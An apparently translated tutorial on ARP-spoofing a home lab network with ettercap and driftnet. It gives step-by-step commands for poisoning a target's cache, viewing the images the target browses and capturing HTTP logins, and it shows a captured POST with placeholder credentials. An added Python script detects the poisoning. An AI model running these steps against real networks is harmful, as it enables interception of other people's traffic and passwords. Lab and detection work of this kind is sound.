ARP sniffing: ettercap + driftnet

ARP:

Address Resolution Protocol: looks up the MAC (physical) address that belongs to an IP address so that communication can take place on the physical network.

How ARP works:

Computer A (192.168.1.2) wants to talk to computer B (192.168.1.3). Network communication requires knowing the other side's MAC address before any data can be transmitted, so A broadcasts on the network: "Who has IP address 192.168.1.3? Tell me your MAC address." Every computer other than B receives the broadcast, sees that it does not concern it, and stays silent; only B replies and tells A its MAC address.

How ARP spoofing works:

Computer C (192.168.1.7, MAC address xx.xx) broadcasts a lie on the network: "My IP is 192.168.1.1 and my MAC address is xx.xx." Every computer that receives the message remembers this false information (it is stored in the ARP cache table), and from then on all data addressed to 192.168.1.1 is sent to MAC address xx.xx, that is, to computer C (192.168.1.7).

How the attack works: on a typical home network, computers send their traffic to the gateway (the router). If the target machine's ARP cache can be made to store the attacker's information in place of the gateway's, the attacker can impersonate the gateway, all of the target's traffic is sent to the attacker, and the connection is hijacked.

Gateway: 192.168.1.1 (router)

Target: 192.168.1.8 (Windows XP)

Attacker: 192.168.1.7 (Linux)

View the target's ARP cache:

C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.8 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           ec-xx-xx-xx-xx-3f     dynamic

Starting the attack:

  1. On the attacker, open ettercap and click Sniff -> Unified sniffing -> eth0
  2. Hosts -> Scan for hosts
  3. Hosts -> Host list
  4. Select the target IP 192.168.1.8 and click Add to Target1; select the gateway 192.168.1.1 and click Add to Target2
  5. Mitm -> ARP poisoning -> tick Sniff remote connections. At this point the target has been spoofed: checking the ARP cache on the target shows that the MAC address recorded for the gateway IP 192.168.1.1 has become the attacker's MAC address, so data sent to the gateway now goes to the attacker.

C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.8 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           08-xx-xx-xx-xx-5e     dynamic
  192.168.1.7           08-xx-xx-xx-xx-5e     dynamic
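The two arp -a listings above contain the whole detection signal a defender needs: the gateway's MAC changes from its known value, and one MAC (the attacker's) is suddenly listed for two IPs. The following script is an added example, not part of the original post or of ettercap; it parses Windows-style arp -a output and raises both alerts. The sample cache dumps and MAC addresses in it are constructed to mirror the listings above, and the gateway IP and baseline MAC are assumed to be supplied by the operator.

```python
"""Detect ARP-cache poisoning from the text output of Windows `arp -a`."""
import re
from collections import defaultdict

# One table row, e.g. "  192.168.1.1   ec-11-22-33-44-3f   dynamic"
ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"        # IPv4 address
    r"([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+"     # Windows-style MAC (dash separated)
    r"(dynamic|static)\s*$",
    re.IGNORECASE,
)


def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` output; MACs are normalised to lowercase.

    Header lines ("Interface: ...", "Internet Address ...") do not match ROW
    and are skipped.
    """
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def check_arp_table(table, gateway_ip, known_gateway_mac):
    """Return a list of alert strings; an empty list means nothing suspicious.

    Two checks: (1) the gateway's MAC differs from the recorded baseline,
    (2) a single MAC answers for more than one IP, which is what a poisoned
    cache looks like when the attacker's real entry is also present.
    """
    alerts = []
    expected = known_gateway_mac.lower()
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        alerts.append(f"gateway {gateway_ip} is missing from the ARP cache")
    elif gw_mac != expected:
        alerts.append(
            f"gateway {gateway_ip} MAC changed: expected {expected}, cache has {gw_mac}"
        )

    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims several IPs: {', '.join(sorted(ips))}")
    return alerts


# Constructed sample dumps (MAC values are made up); they mirror the page's
# "before" and "after" listings for the 192.168.1.0/24 lab network.
CLEAN = """Interface: 192.168.1.8 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           ec-11-22-33-44-3f     dynamic
"""

POISONED = """Interface: 192.168.1.8 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           08-aa-bb-cc-dd-5e     dynamic
  192.168.1.7           08-aa-bb-cc-dd-5e     dynamic
"""

GATEWAY_IP = "192.168.1.1"
BASELINE_GATEWAY_MAC = "ec-11-22-33-44-3f"  # assumed: recorded on a known-good day

if __name__ == "__main__":
    for label, dump in (("clean", CLEAN), ("poisoned", POISONED)):
        found = check_arp_table(parse_arp_table(dump), GATEWAY_IP, BASELINE_GATEWAY_MAC)
        print(f"{label}: {found or 'no alerts'}")
```

The baseline MAC has to come from somewhere trustworthy (the router's label or a capture taken on a known-good network), because a check that learns the baseline from the first dump it sees would happily learn the poisoned value. On a real network the same two signals are what a static ARP entry for the gateway or a switch with dynamic ARP inspection removes; the script only detects, it does not repair the cache.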

 

Viewing the images the target browses:

  1. On the attacker, open driftnet with the command driftnet -i eth0
  2. Now, whenever the target browses images, their contents can be seen on the attacker.
  3. driftnet -i eth0 -d /root/Pictures -a saves the images to the specified directory
  4. Close ettercap to stop sniffing; checking the target's ARP cache again shows that it has reverted to the original entry

C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.8 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           ec-xx-xx-xx-xx-3f     dynamic

Sniffing the target's HTTP account name and password:

  1. On the attacker, open ettercap and click Sniff -> Unified sniffing -> eth0
  2. Hosts -> Scan for hosts
  3. Hosts -> Host list
  4. Select the target IP 192.168.1.8 and click Add to Target1; select the gateway 192.168.1.1 and click Add to Target2
  5. Mitm -> ARP poisoning -> tick Sniff remote connections
  6. Start -> Start sniffing
  7. View -> Connections shows the captured traffic; double-click an entry to see its details. Below is a captured login with account name aaaaaaa and password bbbbbbb.

POST /login.php?nowtime=1545925967777&verify=fba67eef HTTP/1.1.
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.
Referer: http://www.xxx.com/thread.php?fid=38.
Accept-Language: zh-cn.
Content-Type: application/x-www-form-urlencoded.
UA-CPU: x86.
Accept-Encoding: gzip, deflate.
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2).
Host: www.xxx.com.
Content-Length: 109.
Connection: Keep-Alive.
Cache-Control: no-cache.
Cookie: dd452_lastvisit=1769%091545925789%09%2Flogin.php%3Fnowtime1545925789701%26verifyfba67eef; dd452_lastpos=other; dd452_ol_offset=11543; dd452_ipstate=1545924020; _ac_app_ua=8a8f4074b5cc6c0ef5; dd452_cloudClientUid=5450535; dd452_threadlog=%2C38%2C..
jumpurl=http%3A%2F%2Fwww.xxx.com%2Fthread.php%3Ffid%3D38&step=2&ajax=1&pwuser=aaaaaaa&pwpwd=bbbbbbb&lgt=0


Using the command line:

Attack command:

sudo ettercap -Tqi en0 -M arp:remote /192.168.1.4// /192.168.1.1// -l /tmp/log

This creates the files log.eci and log.ecp under /tmp, which can be read directly with etterlog:

etterlog log.ecp